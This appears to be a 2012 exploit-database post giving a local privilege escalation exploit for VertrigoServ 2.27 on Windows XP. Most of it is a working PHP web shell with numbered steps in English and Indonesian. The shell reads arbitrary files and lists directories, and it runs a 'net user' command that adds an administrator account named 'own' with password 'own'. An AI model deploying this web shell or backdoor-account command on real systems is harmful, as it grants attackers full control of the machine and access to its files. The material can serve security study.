=====================================================
Vertrigoserv 2.27 Local Privilege Escalation Exploit
====================================================

:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Vertrigoserv 2.27 Local Privilege Escalation Exploit
: # Date : May 19th 2012
: # Author : X-Cisadane
: # Software Link : http://vertrigo.sourceforge.net/
: # Version : 2.27
: # Category : Desktop (Windows) Applications
: # Platform : Win32
: # Vulnerability : Local Privilege Escalation Exploit
: # Tested On : Windows XP Professional Service Pack 3
: # Greetz to : Inphex, X-Code, Borneo Crew, Depok Cyber, Dunia Santai,
Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari
:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------:

Proof Of Concept :
================
[ENGLISH]
1.Run VertrigoServ
2.Create a file named script.php in X:\VertrigoServ Installation
Directory\www\
3.Fill script.php with this script & save!
<?php
//I'm using code from Inphex (inphex0 at googlemail.com)
//Copyrighted (C) Inphex
error_reporting(E_ALL ^ E_NOTICE);
$qQa = ($_GET['qmB'] == "")?"./":$_GET['qmB'];
$qQd = opendir($qQa);

if (isset($_GET['qrF']))
{
    $qrX = fopen($_GET['qrF'],"r");
    echo fread($qrX,50000);
    exit;
} elseif(isset($_GET['qQx'])) { exec("net user own own /add & net
localgroup Administrators own /add"); echo "User own -> full privileges
successfully added";exit;}
echo "<textarea rows=40 cols=80
style='position:absolute;margin-left:390;'>";
echo htmlspecialchars(shell_exec("cd ".$qQa." & dir"));
echo "</textarea>";
while (false !== ($qQr = readdir($qQd))){

switch(filetype($qQa.$qQr))
    {
    case "dir":
        echo "<a
href=?qmB=".urlencode(htmlspecialchars(realpath($qQa.$qQr)))."/>".htmlspecialchars($qQr)."</a><br>";
    break;
    case "file":
        echo "<a
href=?qrF=".urlencode(htmlspecialchars(realpath($qQa.$qQr))).">".htmlspecialchars($qQr)."</a><br>";
    break;
    }
}
?>

4.Open your browser & go to http://localhost/script.php?qQx
5.If successfull, it will show this message : User own -> full privileges
successfully added
6.Now, open Command Prompt and type Net User then press enter! It will show
a new user (own) & the password is own.

[INDONESIAN]
1.Jalankan VertrigoServ
2.Buat sebuah berkas dengan nama script.php pada X:\Direktori tempat
menginstall VertrigoServ\www\
3.Isi berkas script.php dengan script berikut & simpan!
4.Buka browser anda, masuk ke http://localhost/script.php?qQx
5.Jika berhasil, akan muncul pesan ini User own -> full privileges
successfully added
6.Sekarang buka Command Prompt dan ketik Net User kemudian tekan enter!
Kemudian akan muncul sebuah user baru dengan nama own dan password own